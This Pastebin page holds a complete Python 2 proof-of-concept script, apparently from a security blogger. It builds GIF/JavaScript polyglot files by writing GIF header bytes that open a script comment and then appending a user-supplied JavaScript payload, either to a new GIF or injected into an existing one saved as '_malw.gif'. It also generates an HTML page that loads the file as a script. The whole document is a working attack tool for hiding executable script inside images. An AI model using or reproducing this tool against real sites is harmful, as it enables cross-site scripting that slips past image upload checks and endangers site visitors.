Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- #============================================================================================================#
- #======= Simply injects a JavaScript Payload into a GIF. ====================================================#
- #======= or it creates a JavaScript Payload as a GIF. ====================================================#
- #======= The resulting GIF must be a valid (not corrupted) GIF. =============================================#
- #======= Author: marcoramilli.blogspot.com ==================================================================#
- #======= Version: PoC (don't even think to use it in development env.) ======================================#
- #======= Disclaimer: ========================================================================================#
- #THIS IS NOT PEP3 FORMATTED
- #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
- #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
- #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
- #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
- #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
- #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
- #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
- #POSSIBILITY OF SUCH DAMAGE.
- #===========================================================================================================#
- import argparse
- import os
- #---------------------------------------------------------
- def _hexify(num):
- """
- Converts and formats to hexadecimal
- """
- num = "%x" % num
- if len(num) % 2:
- num = '0'+num
- return num.decode('hex')
- #---------------------------------------------------------
- def _generate_and_write_to_file(payload, fname):
- """
- Generates a fake but valid GIF within scriting
- """
- f = open(fname, "wb")
- header = (b'\x47\x49\x46\x38\x39\x61' #Signature + Version GIF89a
- b'\x2F\x2A' #Encoding /* it's a valid Logical Screen Width
- b'\x0A\x00' #Smal Logical Screen Height
- b'\x00' #GCTF
- b'\xFF' #BackgroundColor
- b'\x00' #Pixel Ratio
- b'\x2C\x00\x00\x00\x00\x2F\x2A\x0A\x00\x00\x02\x00\x3B' #GlobalColorTable + Blocks
- b'\x2A\x2F' #Commenting out */
- b'\x3D\x31\x3B' # enable the script side by introducing =1;
- )
- trailer = b'\x3B'
- # I made this explicit, step by step .
- f.write(header)
- f.write(payload)
- f.write(trailer)
- f.close()
- return True
- #---------------------------------------------------------
- def _generate_launching_page(f):
- """
- Creates the HTML launching page
- """
- htmlpage ="""
- <html>
- <head><title>Opening an image</title> </head>
- <body>
- <img src=\"""" + f + """_malw.gif\"\>
- <script src= \"""" + f + """_malw.gif\"> </script>
- </body>
- </html>
- """
- html = open("run.html", "wb")
- html.write(htmlpage);
- html.close()
- return True
- #---------------------------------------------------------
- def _inject_into_file(payload, fname):
- """
- Injects the payload into existing GIF
- NOTE: if the GIF contains \xFF\x2A and/or \x2A\x5C might caouse issues
- """
- # I know, I can do it all in memory and much more fast.
- # I wont do it here.
- with open(fname + "_malw.gif", "w+b") as fout:
- with open(fname, "rt") as fin:
- for line in fin:
- ls1 = line.replace(b'\x2A\x2F', b'\x00\x00')
- ls2 = ls1.replace(b'\x2F\x2A', b'\x00\x00')
- fout.write(ls2)
- fout.seek(6,0)
- fout.write(b'\x2F\x2A') #/*
- f = open(fname + "_malw.gif", "a+b") #appending mode
- f.write(b'\x2A\x2F\x3D\x31\x3B')
- f.write(payload)
- f.write(b'\x3B')
- f.close()
- return True
- #---------------------------------------------------------
- if __name__ == "__main__":
- parser = argparse.ArgumentParser()
- parser.add_argument("filename",help="the gif file name to be generated/or infected")
- parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
- parser.add_argument("-i", "--inject-to-existing-gif", action="store_true", help="inject into the current gif")
- args = parser.parse_args()
- print("""
- |======================================================================================================|
- | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal. |
- | It is the end user's responsibility to obey all applicable local, state and federal laws. |
- | Authors assume no liability and are not responsible for any misuse or damage caused by this program |
- |======================================================================================================|
- """
- )
- if args.inject_to_existing_gif:
- _inject_into_file(args.js_payload, args.filename)
- else:
- _generate_and_write_to_file(args.js_payload, args.filename)
- _generate_launching_page(args.filename)
- print "[+] Finished!"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement